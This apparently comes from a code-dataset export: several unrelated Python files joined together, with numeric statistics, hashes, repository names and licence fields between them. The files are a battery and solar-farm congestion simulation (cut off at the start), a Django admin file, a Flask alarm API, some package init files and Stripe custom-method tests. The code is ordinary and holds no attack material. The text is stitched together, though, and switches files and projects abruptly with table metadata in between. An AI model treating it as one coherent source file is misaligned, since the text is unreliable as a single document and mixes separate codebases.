return run_single_month_set_strategy(verbose_lvl, random_point_based_strategy, transportation_kw, congestion_kw, month)
def run_single_month_set_strategy(verbose_lvl=1, strategy=None, transportation_kw=2000, congestion_kw=14000, month=None):
if month is None:
# No target month given: fall back to running over all monthly timings
# (note this path generates its own random strategy).
return run_random_strategy_with_monthly_times(verbose_lvl, None, transportation_kw, congestion_kw)
congestion_safety_margin = 0.99
# Initialise environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
# Initialise solar farm
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
# Initialise battery
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
# Initialise random strategy
if strategy is None:
money_earning_strategy = generate_random_discharge_relative_strategy()
else:
money_earning_strategy = strategy
greedy_discharge_strat = CsvStrategy('Greedy discharge', strategy_csv='data/strategies/greedy_discharge_60.csv')
always_discharge_strat = CsvStrategy('Always discharge', strategy_csv='data/strategies/always_discharge.csv')
solve_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Solve Congestion Controller",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=greedy_discharge_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=money_earning_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
res_df = get_month_congestion_timings(solarvation_identifier='data/environments/lelystad_1_2021.csv', strategy=1)
earning_money_until = res_df.loc['prep_start']
preparing_for_congestion_until = res_df.loc['congestion_start']
preparing_max_kwh = res_df.loc['prep_max_soc']
solving_congestion_until = res_df.loc['congestion_end']
assert 12 >= month >= 1
month = month - 1
print(res_df[month].to_string())
moo = ModesOfOperationController(name=f'Wombat controller month {month}',
network_object=battery,
verbose_lvl=verbose_lvl)
if earning_money_until[month] is not NaT:
moo.add_mode_of_operation(earning_money_until[month], earn_money_mod)
max_kwh_in_prep = float(preparing_max_kwh[month])
max_soc_perc_in_prep = int(max_kwh_in_prep / battery.max_kwh * 100)
discharge_until_strategy = DischargeUntilStrategy(base_strategy=money_earning_strategy,
name=f'Discharge until {max_kwh_in_prep} -> Money Earner',
discharge_until_soc_perc=max_soc_perc_in_prep
)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=discharge_until_strategy,
verbose_lvl=verbose_lvl)
moo.add_mode_of_operation(preparing_for_congestion_until[month], prepare_congestion_mod)
moo.add_mode_of_operation(solving_congestion_until[month], solve_congestion_mod)
moo.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(moo, [1, 3, 4, 0])
# Run two days
starting_timestep = 129600 + 25 * 1440
number_of_steps = 2 * 1440
return run_simulation(starting_timestep, number_of_steps, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
# return run_single_month(month + 1, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
if __name__ == '__main__':
verbose_lvl = 1
# baseline_rhino_simulation(verbose_lvl)
# random_rhino_strategy_simulation(verbose_lvl=verbose_lvl, seed=4899458002697043430)
# rhino_windnet_limited_charging(verbose_lvl)
# full_rhino_site_capacity()
####################################################################
# congestion_causing_strategy = PointBasedStrategy('Congestion cause', price_step_size=2)
#
# congestion_causing_strategy.add_point((13, 152, 'CHARGE'))
# congestion_causing_strategy.add_point((25, 126, 'CHARGE'))
# congestion_causing_strategy.add_point((48, 108, 'CHARGE'))
# congestion_causing_strategy.add_point((61, 80, 'CHARGE'))
# congestion_causing_strategy.add_point((95, 26, 'CHARGE'))
# congestion_causing_strategy.add_point((32, 192, 'DISCHARGE'))
# congestion_causing_strategy.add_point((45, 154, 'DISCHARGE'))
# congestion_causing_strategy.add_point((76, 178, 'DISCHARGE'))
# congestion_causing_strategy.add_point((94, 164, 'DISCHARGE'))
# congestion_causing_strategy.add_point((95, -68, 'DISCHARGE'))
#
# congestion_causing_strategy.upload_strategy()
# print(congestion_causing_strategy)
# print(run_single_month_set_strategy(verbose_lvl, strategy=congestion_causing_strategy, month=4))
####################################################################
res_arr = []
temp_dict = solarvation_dumb_discharging(verbose_lvl)
temp_dict['name'] = 'Solarvation only discharging'
res_arr.append(temp_dict)
temp_dict = wombat_solarvation_limited_charging(verbose_lvl)
temp_dict['name'] = 'Wombat disregard congestion (with base money strat)'
res_arr.append(temp_dict)
temp_dict = wombat_solarvation_limited_charging(verbose_lvl, base_money_strat=False)
temp_dict['name'] = 'Wombat disregard congestion GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = super_naive_baseline(verbose_lvl)
temp_dict['name'] = 'Wombat only solve congestion'
res_arr.append(temp_dict)
temp_dict = baseline(verbose_lvl)
temp_dict['name'] = 'Wombat yearly timing (with base money strat)'
res_arr.append(temp_dict)
temp_dict = baseline(verbose_lvl, base_money_strat=False)
temp_dict['name'] = 'Wombat yearly timing GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=2)
print(temp_dict)
temp_dict['name'] = 'Wombat conservative monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=2, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat conservative monthly timed GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=1)
print(temp_dict)
temp_dict['name'] = 'Wombat smart monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=1, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat smart monthly timed GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=5)
print(temp_dict)
temp_dict['name'] = 'Wombat max smart monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=5, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat max smart monthly timed GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=6)
print(temp_dict)
temp_dict['name'] = 'Wombat avg smart monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=6, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat avg smart monthly timed GIGA Baseline'
res_arr.append(temp_dict)
print(res_arr)
res_df = pd.DataFrame(res_arr)
print(res_df)
res_df.to_csv('data/baseline_earnings/auto_overview.csv')
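The `__main__` block above repeats the same run / label / append triple for every scenario. A small helper could collapse each triple to one call; this is an illustrative sketch (the helper name and the result keys are not from the original module):

```python
def collect(res_arr, name, result_dict):
    """Label one scenario's result dict and append it to the result list."""
    labeled = dict(result_dict)   # copy so the caller's dict is untouched
    labeled['name'] = name
    res_arr.append(labeled)
    return labeled

runs = []
collect(runs, 'baseline', {'total_earnings': 10})
collect(runs, 'smart monthly', {'total_earnings': 12})
```

Each `temp_dict = ...; temp_dict['name'] = ...; res_arr.append(temp_dict)` block would then become a single `collect(res_arr, '<label>', <simulation call>)` line before building the DataFrame.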
| 61.933894 | 189 | 0.645733 | 5,357 | 51,529 | 5.841702 | 0.065335 | 0.076372 | 0.049434 | 0.058158 | 0.85796 | 0.83508 | 0.802071 | 0.784559 | 0.769253 | 0.736435 | 0 | 0.024659 | 0.282268 | 51,529 | 831 | 190 | 62.008424 | 0.82149 | 0.055852 | 0 | 0.659711 | 0 | 0 | 0.100258 | 0.036846 | 0 | 0 | 0 | 0 | 0.00321 | 1 | 0.033708 | false | 0.011236 | 0.038523 | 0 | 0.093098 | 0.05618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89c385a1cc6d309170885a93d4699d56f7794fde | 206 | py | Python | portfolio/admin.py | tmbyers1102/ourtsy_v1 | 23ace98c82b0677f9d6ef7ee1096286f78c10b7d | [
"MIT"
] | null | null | null | portfolio/admin.py | tmbyers1102/ourtsy_v1 | 23ace98c82b0677f9d6ef7ee1096286f78c10b7d | [
"MIT"
] | null | null | null | portfolio/admin.py | tmbyers1102/ourtsy_v1 | 23ace98c82b0677f9d6ef7ee1096286f78c10b7d | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import ArtItem, Artist, Portfolio, Genres
admin.site.register(ArtItem)
admin.site.register(Artist)
admin.site.register(Portfolio)
admin.site.register(Genres)
| 22.888889 | 54 | 0.815534 | 28 | 206 | 6 | 0.428571 | 0.214286 | 0.404762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082524 | 206 | 8 | 55 | 25.75 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
89f4f70a52e114be9f89d6e38ee641d9085fa765 | 192 | py | Python | napari/utils/context/__init__.py | MaksHess/napari | 64a144607342c02177fc62fa83a3442ace0a98e7 | [
"BSD-3-Clause"
] | 1,345 | 2019-03-03T21:14:14.000Z | 2022-03-31T19:46:39.000Z | napari/utils/context/__init__.py | MaksHess/napari | 64a144607342c02177fc62fa83a3442ace0a98e7 | [
"BSD-3-Clause"
] | 3,904 | 2019-03-02T01:30:24.000Z | 2022-03-31T20:17:27.000Z | napari/utils/context/__init__.py | MaksHess/napari | 64a144607342c02177fc62fa83a3442ace0a98e7 | [
"BSD-3-Clause"
] | 306 | 2019-03-29T17:09:10.000Z | 2022-03-30T09:54:11.000Z | from ._context import Context, create_context, get_context
from ._layerlist_context import LayerListContextKeys
__all__ = ['Context', 'create_context', 'get_context', 'LayerListContextKeys']
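As an aside, layered key/value contexts of this kind are commonly built on `collections.ChainMap`, where a child scope shadows its parents and writes stay local to the child. A stdlib-only sketch of that layering idea (not napari's actual implementation; the keys are made up):

```python
from collections import ChainMap

root = ChainMap({'num_layers': 0})
child = root.new_child({'num_selected': 2})  # child looks up its own map first

child['num_layers'] = 3  # writes go to the child's first map only
```

Lookups in `child` fall through to `root` for missing keys, while `root` never sees the child's writes.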
| 38.4 | 78 | 0.817708 | 20 | 192 | 7.3 | 0.4 | 0.178082 | 0.273973 | 0.315068 | 0.410959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088542 | 192 | 4 | 79 | 48 | 0.834286 | 0 | 0 | 0 | 0 | 0 | 0.270833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c38cd8e5d3c7e66e294d29f230be9348c21c717a | 6,073 | py | Python | api/alarm.py | ThinkmanWang/NotesServer | 86a1f7f56b30f94aaccd3d70941e3873cc1713e2 | [
"Apache-2.0"
] | null | null | null | api/alarm.py | ThinkmanWang/NotesServer | 86a1f7f56b30f94aaccd3d70941e3873cc1713e2 | [
"Apache-2.0"
] | 1 | 2021-06-01T21:40:51.000Z | 2021-06-01T21:40:51.000Z | api/alarm.py | ThinkmanWang/NotesServer | 86a1f7f56b30f94aaccd3d70941e3873cc1713e2 | [
"Apache-2.0"
] | null | null | null |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'models'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'utils'))
from importlib import reload  # the "imp" module is deprecated and removed in Python 3.12
import MySQLdb
import json
import hashlib
import time
import uuid
from flask import Flask, render_template, request, redirect, url_for, send_from_directory
from flask import render_template
from werkzeug.utils import secure_filename  # the top-level re-export was removed in Werkzeug 1.0
from utils.mysql_python import MysqlPython
from utils.object2json import obj2json
from models.RetModel import RetModel
from utils.user_db_utils import *
from utils.alarm_db_utils import *
from utils.note_db_utils import *
from models.Alarm import Alarm
from error_code import *
from flask import Blueprint
alarm_api = Blueprint('alarm_api', __name__)
#For alarm
@alarm_api.route("/api/get_alarm_list", methods=['POST', 'GET'])
def get_alarm_list():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form.get('uid', ''), request.form.get('token', ''))):
return obj2json(RetModel(21, dict_err_code[21], {}) )
lstAlarm = select_alarm_list(request.form['uid'], request.form.get('type', '0'))
szRet = obj2json(RetModel(0, dict_err_code[0], lstAlarm) )
return szRet
@alarm_api.route("/api/get_alarm", methods=['POST', 'GET'])
def get_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
szRet = obj2json(RetModel(1024, dict_err_code[1024], {}) )
return szRet
@alarm_api.route("/api/add_alarm", methods=['POST', 'GET'])
def add_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (request.form.get('id', None) is None):
return obj2json(RetModel(51, dict_err_code[51]))
if (request.form.get('note_id', None) is None):
return obj2json(RetModel(52, dict_err_code[52]))
if (request.form.get('date', None) is None):
return obj2json(RetModel(53, dict_err_code[53]))
if (request.form.get('update_date', None) is None):
return obj2json(RetModel(54, dict_err_code[54]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (False == if_noteid_exists(request.form['note_id'])):
return obj2json(RetModel(41, dict_err_code[41]))
if (True == insert_alarm(request.form['uid'], request.form['id'], request.form['note_id'], request.form['date'], request.form['update_date'])):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@alarm_api.route("/api/update_alarm", methods=['POST', 'GET'])
def update_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (request.form.get('id', None) is None):
return obj2json(RetModel(51, dict_err_code[51]))
if (request.form.get('note_id', None) is None):
return obj2json(RetModel(52, dict_err_code[52]))
if (request.form.get('date', None) is None):
return obj2json(RetModel(53, dict_err_code[53]))
if (request.form.get('update_date', None) is None):
return obj2json(RetModel(54, dict_err_code[54]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (False == if_noteid_exists(request.form['note_id'])):
return obj2json(RetModel(41, dict_err_code[41]))
szRet = ''
if (False == if_alarm_exists(request.form['id'])):
szRet = obj2json(RetModel(51, dict_err_code[51], {}) )
else:
if (True == update_alarm_info(request.form['uid'], request.form['id'], request.form['note_id'], request.form['date'], request.form['update_date'])):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@alarm_api.route("/api/delete_alarm", methods=['POST', 'GET'])
def delete_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(51, dict_err_code[51]))
if (False == if_alarm_exists(request.form['id'])):
return obj2json(RetModel(51, dict_err_code[51], {}))
if (remove_alarm(request.form['id'])):
return obj2json(RetModel(0, dict_err_code[0], {}) )
else:
return obj2json(RetModel(1000, dict_err_code[1000], {}) )
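Every handler above re-implements the same chain of `request.form.get(...) is None` checks. A table-driven validator could centralize that; the helper below is a hypothetical sketch (the field-to-error-code pairs are taken from the `add_alarm`/`update_alarm` checks above):

```python
def first_missing_field(form, required):
    """Return the error code of the first missing field, or None if all are present."""
    for field, err_code in required:
        if form.get(field) is None:
            return err_code
    return None

# Field/error-code table mirroring the checks in add_alarm() and update_alarm().
ADD_ALARM_FIELDS = [('uid', 21), ('token', 21), ('id', 51),
                    ('note_id', 52), ('date', 53), ('update_date', 54)]
```

A handler would then start with `code = first_missing_field(request.form, ADD_ALARM_FIELDS)` and return `obj2json(RetModel(code, dict_err_code[code]))` whenever `code` is not None.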
| 39.180645 | 157 | 0.621439 | 810 | 6,073 | 4.47284 | 0.111111 | 0.139663 | 0.109302 | 0.061827 | 0.810654 | 0.773392 | 0.73199 | 0.713773 | 0.677615 | 0.655258 | 0 | 0.038413 | 0.224107 | 6,073 | 154 | 158 | 39.435065 | 0.730475 | 0.001482 | 0 | 0.590909 | 0 | 0 | 0.062119 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.181818 | 0 | 0.527273 | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
c398962a05b59ebd5c5a8a3345848d78818a5d7f | 404 | py | Python | __init__.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | 1 | 2018-01-11T14:01:05.000Z | 2018-01-11T14:01:05.000Z | __init__.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | __init__.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | # Base
from observable_primitives.base import Observer, Observable
# Observables
from observable_primitives.observables import ObservableBool, ObservableComplex, \
ObservableFloat, ObservableInteger
# Observers
from observable_primitives.observers import IntegerConditionObserver, CounterConditionObserver, \
FloatConditionObserver, NumericPrintObserver, HoldNumericPrintObserver, PrintObserver
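The exported names suggest a classic observer pattern. A minimal stdlib sketch of that pattern (the real `Observer`/`Observable` base classes in this package may use different method names):

```python
class Observer:
    """Receives notifications from an Observable."""
    def update(self, value):
        raise NotImplementedError

class Observable:
    """Keeps a list of observers and pushes values to them."""
    def __init__(self):
        self._observers = []

    def register(self, observer):
        self._observers.append(observer)

    def notify(self, value):
        for observer in self._observers:
            observer.update(value)

class Recorder(Observer):
    """Concrete observer that remembers every value it was notified with."""
    def __init__(self):
        self.seen = []

    def update(self, value):
        self.seen.append(value)

source = Observable()
recorder = Recorder()
source.register(recorder)
source.notify(41)
source.notify(42)
```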
| 40.4 | 97 | 0.863861 | 30 | 404 | 11.533333 | 0.6 | 0.121387 | 0.208092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094059 | 404 | 9 | 98 | 44.888889 | 0.945355 | 0.064356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c3cb5390e87f183f80a8bf0466f97119b17ae589 | 608 | py | Python | allennlp/training/callbacks/__init__.py | MSLars/allennlp | 2cdb8742c8c8c3c38ace4bdfadbdc750a1aa2475 | [
"Apache-2.0"
] | null | null | null | allennlp/training/callbacks/__init__.py | MSLars/allennlp | 2cdb8742c8c8c3c38ace4bdfadbdc750a1aa2475 | [
"Apache-2.0"
] | 22 | 2021-10-08T21:52:18.000Z | 2021-12-24T01:00:47.000Z | allennlp/training/callbacks/__init__.py | MSLars/allennlp | 2cdb8742c8c8c3c38ace4bdfadbdc750a1aa2475 | [
"Apache-2.0"
] | null | null | null | from allennlp.training.callbacks.callback import TrainerCallback
from allennlp.training.callbacks.console_logger import ConsoleLoggerCallback
from allennlp.training.callbacks.confidence_checks import ConfidenceChecksCallback
from allennlp.training.callbacks.tensorboard import TensorBoardCallback
from allennlp.training.callbacks.track_epoch import TrackEpochCallback
from allennlp.training.callbacks.wandb import WandBCallback
from allennlp.training.callbacks.backward import MixedPrecisionBackwardCallback, OnBackwardException
from allennlp.training.callbacks.should_validate import ShouldValidateCallback
| 67.555556 | 100 | 0.904605 | 61 | 608 | 8.95082 | 0.42623 | 0.175824 | 0.29304 | 0.424908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054276 | 608 | 8 | 101 | 76 | 0.949565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c3e0c437720f6ff6c21c471c5f3932ccf1b6631c | 131 | py | Python | phac/models/__init__.py | jusjusjus/phac-python | 107c1e3f2f80972ff675754af9b38e271f5005b9 | [
"MIT"
] | null | null | null | phac/models/__init__.py | jusjusjus/phac-python | 107c1e3f2f80972ff675754af9b38e271f5005b9 | [
"MIT"
] | null | null | null | phac/models/__init__.py | jusjusjus/phac-python | 107c1e3f2f80972ff675754af9b38e271f5005b9 | [
"MIT"
] | null | null | null | from .triangle_wave import triangle_wave
from .sin_with_noise import sin_with_noise
__all__ = ['triangle_wave', 'sin_with_noise']
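For illustration, a triangle wave fits in a few lines; this sketch is hypothetical and the packaged `triangle_wave` may use a different signature or amplitude convention:

```python
def triangle_wave(t, period=1.0, amplitude=1.0):
    """Triangle wave: peaks at multiples of `period`, troughs halfway between."""
    phase = (t / period) % 1.0  # position within one cycle, in [0, 1)
    return amplitude * (4.0 * abs(phase - 0.5) - 1.0)
```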
| 26.2 | 45 | 0.824427 | 20 | 131 | 4.75 | 0.4 | 0.378947 | 0.378947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099237 | 131 | 4 | 46 | 32.75 | 0.805085 | 0 | 0 | 0 | 0 | 0 | 0.206107 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c3e2c38df08c796b5cdc8a4d7eb5e15deebcb4e3 | 4,749 | py | Python | tests/api_resources/abstract/test_custom_method.py | HELP-ALI-PLEASE-HE-HAS-SMA-ONLY-2-YEARS/stripe-python | 053f1a2c376dd40b723f680bfc48c624be25b5c6 | [
"MIT"
] | 1,078 | 2015-01-06T03:35:05.000Z | 2022-03-25T13:25:48.000Z | tests/api_resources/abstract/test_custom_method.py | imvickykumar999/stripe-python | e7e2ebaa53060ca75883de7f982c3fb527633022 | [
"MIT"
] | 558 | 2015-01-07T19:05:02.000Z | 2022-03-28T22:19:24.000Z | tests/api_resources/abstract/test_custom_method.py | imvickykumar999/stripe-python | e7e2ebaa53060ca75883de7f982c3fb527633022 | [
"MIT"
] | 382 | 2015-01-04T14:06:09.000Z | 2022-03-16T04:52:04.000Z | from __future__ import absolute_import, division, print_function
import stripe
from stripe import util
class TestCustomMethod(object):
@stripe.api_resources.abstract.custom_method(
"do_stuff", http_verb="post", http_path="do_the_thing"
)
@stripe.api_resources.abstract.custom_method(
"do_stream_stuff",
http_verb="post",
http_path="do_the_stream_thing",
is_streaming=True,
)
class MyResource(stripe.api_resources.abstract.APIResource):
OBJECT_NAME = "myresource"
def do_stuff(self, idempotency_key=None, **params):
url = self.instance_url() + "/do_the_thing"
headers = util.populate_headers(idempotency_key)
self.refresh_from(self.request("post", url, params, headers))
return self
def do_stream_stuff(self, idempotency_key=None, **params):
url = self.instance_url() + "/do_the_stream_thing"
headers = util.populate_headers(idempotency_key)
return self.request_stream("post", url, params, headers)
def test_call_custom_method_class(self, request_mock):
request_mock.stub_request(
"post",
"/v1/myresources/mid/do_the_thing",
{"id": "mid", "thing_done": True},
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.do_stuff("mid", foo="bar")
request_mock.assert_requested(
"post", "/v1/myresources/mid/do_the_thing", {"foo": "bar"}
)
assert obj.thing_done is True
def test_call_custom_stream_method_class(self, request_mock):
request_mock.stub_request_stream(
"post",
"/v1/myresources/mid/do_the_stream_thing",
"response body",
rheaders={"request-id": "req_id"},
)
resp = self.MyResource.do_stream_stuff("mid", foo="bar")
request_mock.assert_requested_stream(
"post", "/v1/myresources/mid/do_the_stream_thing", {"foo": "bar"}
)
body_content = resp.io.read()
if hasattr(body_content, "decode"):
body_content = body_content.decode("utf-8")
assert body_content == "response body"
def test_call_custom_method_class_with_object(self, request_mock):
request_mock.stub_request(
"post",
"/v1/myresources/mid/do_the_thing",
{"id": "mid", "thing_done": True},
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
self.MyResource.do_stuff(obj, foo="bar")
request_mock.assert_requested(
"post", "/v1/myresources/mid/do_the_thing", {"foo": "bar"}
)
assert obj.thing_done is True
def test_call_custom_stream_method_class_with_object(self, request_mock):
request_mock.stub_request_stream(
"post",
"/v1/myresources/mid/do_the_stream_thing",
"response body",
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
resp = self.MyResource.do_stream_stuff(obj, foo="bar")
request_mock.assert_requested_stream(
"post", "/v1/myresources/mid/do_the_stream_thing", {"foo": "bar"}
)
body_content = resp.io.read()
if hasattr(body_content, "decode"):
body_content = body_content.decode("utf-8")
assert body_content == "response body"
def test_call_custom_method_instance(self, request_mock):
request_mock.stub_request(
"post",
"/v1/myresources/mid/do_the_thing",
{"id": "mid", "thing_done": True},
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
obj.do_stuff(foo="bar")
request_mock.assert_requested(
"post", "/v1/myresources/mid/do_the_thing", {"foo": "bar"}
)
assert obj.thing_done is True
def test_call_custom_stream_method_instance(self, request_mock):
request_mock.stub_request_stream(
"post",
"/v1/myresources/mid/do_the_stream_thing",
"response body",
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
resp = obj.do_stream_stuff(foo="bar")
request_mock.assert_requested_stream(
"post", "/v1/myresources/mid/do_the_stream_thing", {"foo": "bar"}
)
body_content = resp.io.read()
if hasattr(body_content, "decode"):
body_content = body_content.decode("utf-8")
assert body_content == "response body"
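The decorator under test attaches a generated class-level method to the resource. A simplified stand-alone sketch of that mechanism (not Stripe's actual implementation, which builds URLs from registered object names and issues real HTTP requests):

```python
def custom_method(name, http_verb, http_path):
    """Attach a classmethod `name` targeting /v1/<object_name>s/<id>/<http_path>."""
    def decorator(cls):
        def call(inner_cls, resource_id, **params):
            url = "/v1/%ss/%s/%s" % (inner_cls.OBJECT_NAME, resource_id, http_path)
            return (http_verb, url, params)  # a real version would send the request
        setattr(cls, name, classmethod(call))
        return cls
    return decorator

@custom_method("do_stuff", http_verb="post", http_path="do_the_thing")
class MyResource:
    OBJECT_NAME = "myresource"
```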
